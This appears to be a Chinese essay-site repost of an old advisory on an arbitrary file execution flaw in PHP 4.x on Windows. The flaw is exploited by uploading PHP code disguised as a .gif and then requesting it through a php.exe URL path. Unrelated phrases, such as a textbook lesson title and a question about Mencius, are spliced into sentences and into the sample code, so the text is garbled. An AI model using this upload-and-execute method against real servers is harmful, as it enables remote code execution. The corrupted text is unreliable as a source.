首页 > 作文

Windows下PHP的任意文件执行漏洞

更新时间:2023-04-06 07:04:11 阅读: 评论:0

受影响系统:

  php version 4.1.1 under windows

  php version 4.0.4 under windows

  

  漏洞描述:

  

  在windows下的php,通过p那年我们十七岁hp.exe,攻击者可以让任何文件作为一个php文件,即使这个文件的扩展名不是php。比如,上传一个文件,但是扩展名是mp3,txt,或者gif等等,然后要求php去执行它。

  例如:

孟子是什么时期的  上传一个gif文件,但是实际上是一个头型名称php脚本文件,文件内容如下:

 装在套子里的人教案 扬州广陵学院#————

  phpinfo();

  ?>

  #————

  

  然后攻击者用php去执行:

  http://www.example.com/php/php.exe/upload_directory/huh.gif

本文发布于:2023-04-06 07:04:08,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/0827cb2ae64f179649bd74d2d1f7785e.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:Windows下PHP的任意文件执行漏洞.doc

本文 PDF 下载地址:Windows下PHP的任意文件执行漏洞.pdf

标签:文件   攻击者   扩展名   孟子
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图